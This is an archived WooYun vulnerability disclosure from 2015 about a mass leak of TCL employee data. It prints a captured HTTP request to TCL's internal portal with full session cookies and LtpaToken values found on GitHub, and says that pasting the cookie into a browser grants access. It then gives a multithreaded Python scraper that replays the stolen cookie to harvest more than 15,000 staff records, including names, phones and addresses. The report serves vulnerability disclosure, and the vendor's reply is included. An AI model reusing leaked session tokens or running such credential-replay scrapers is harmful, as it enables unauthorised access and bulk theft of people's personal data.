乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 细节已通知厂商并且等待厂商处理中 2015-09-17: 厂商已经确认,细节仅向厂商公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
TCL全部员工信息泄漏,包括职位、姓名、电话、住址、email等
1.github search到以下信息https://github.com/s3cu1n4/mycode/blob/master/temp/test.txt
base64解密后结果如下:
GET /phones/ViewInfo.aspx?RoleNo=0101&page=1 HTTP/1.1Host: eip.tcl.comProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36DNT: 1Referer: http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=2Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4Cookie: JAAPSESSIONID=JPlpuPM8OPkWbkkokqs6pTPNiGzNCMPz; Proxy_user=LPGhRYaM8EK9GzmisfwsXTHNwtjGdpqEVpdpwdv6VBR85Wqzfal4wrBkTliCC37B; LtpaToken2=dXXXYV9xPHRLzeV7SlsFqaxJ9mnBPpxCgJJFgSb1AeZuyUCzGu5Atiy3C4UFrQQfua3+0RXVemWraEbKiX6RhnCwSidEkM5sehN/oEU1yYgQ1xVY+gHDMjjNICAHtMguq8UwyKXEc39+Ct45eQF68wsupcpowvhlV1ONmNPWHkxY3nppHy75oaBVk+l4YjXb+PHtZsDlaIa50ur37+OeSIbC4mI+UTHxbWbQste3tmdhieXA5oVCgVPWsBBBtflZrqj1h47RVeGRiIvOIGbvlQwu2OWStA3zAjDOBcnjFMKp33RIANy2wz315TA1C0G8f8m9R5DozkOAseJVLPUCQb/an8LUvRrlvGfmHeJ3RSHOSRPe4WIGhN/7+MpqTOftv6hbxmRmpniPz+JKTWrSkvSa1+dP/tIVU4pNmms8o/bsQovPrBFg6a7qUlD0O/fLG+EqFLasE4mlT9vfz7wOrwvpXGmdXnYds/Q2+a/x0yhHgbHWT0+SKAvH4ZRW6v1w1dfVsZ7DE4RE10ogeWZI8clOp3KfON4wIWG+uQZtuhwKpMf48DY/GGUNtzIMqMEXh6dGI1zRHdnPejxU/PBFfJGztff4p9fqqeir3TQsAQ7FlD9mtQyGwRQ/GL+ZXIQVf0oihuE31sZfCf3P2NqUBiMx/E1AK0cz64CAwyr949M8cH8ZqC6tt/s+Tz2Vc0ItRKsqVFlvifgzR1t+2eez0i66cxmUB8edhIQJ7nKChy5KWyyy6DojsZ2gsDlxNVRz8DCWPWessI5JfAowHZYkSA==; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA==; ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czvConnection: close
复制cookie到浏览器,访问其中的url,即可直接进入eip
TCL全部员工信息一览无余写个脚本爬一下数据
#coding:utf-8import reimport urllib2import threadingimport timestart = 1end = 880def getContent(respInfo): reg1 = r'<param name="flashvars" value="(.*?)">' re.pattern1 = re.compile(reg1) match1 = re.pattern1.findall(respInfo) info = match1[0] if info == ',,,,, ': print "--" else: writeFile(info)def writeFile(info): with open("tclinfo.txt", 'a') as fd: fd.write(info+'\r\n')def request(end): print end try: Url = "http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=%s" %end req = urllib2.Request(Url) req.add_header('User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1795.60 (Edition Baidu)") req.add_header('Accept', '*/*') req.add_header('Cookie', 'ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czv; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA==') resp = urllib2.urlopen(req) respInfo = resp.read().replace("\r", "").replace("\n", "") except: pass finally: getContent(respInfo)def main(): global end global start while end > start: end = end-1 request(end)def thread(): a = threading.Thread(target=main) a.start()if __name__ == '__main__': for t in range(1, 10): thread()
即可爬到所有信息,之后再对信息整理,即可拿到所有用户信息共一万五千多条
危害等级:中
漏洞Rank:8
确认时间:2015-09-17 14:37
您好,该系统已经停止使用,不过暂时未下架,感谢您对TCL的关注,谢谢!
暂无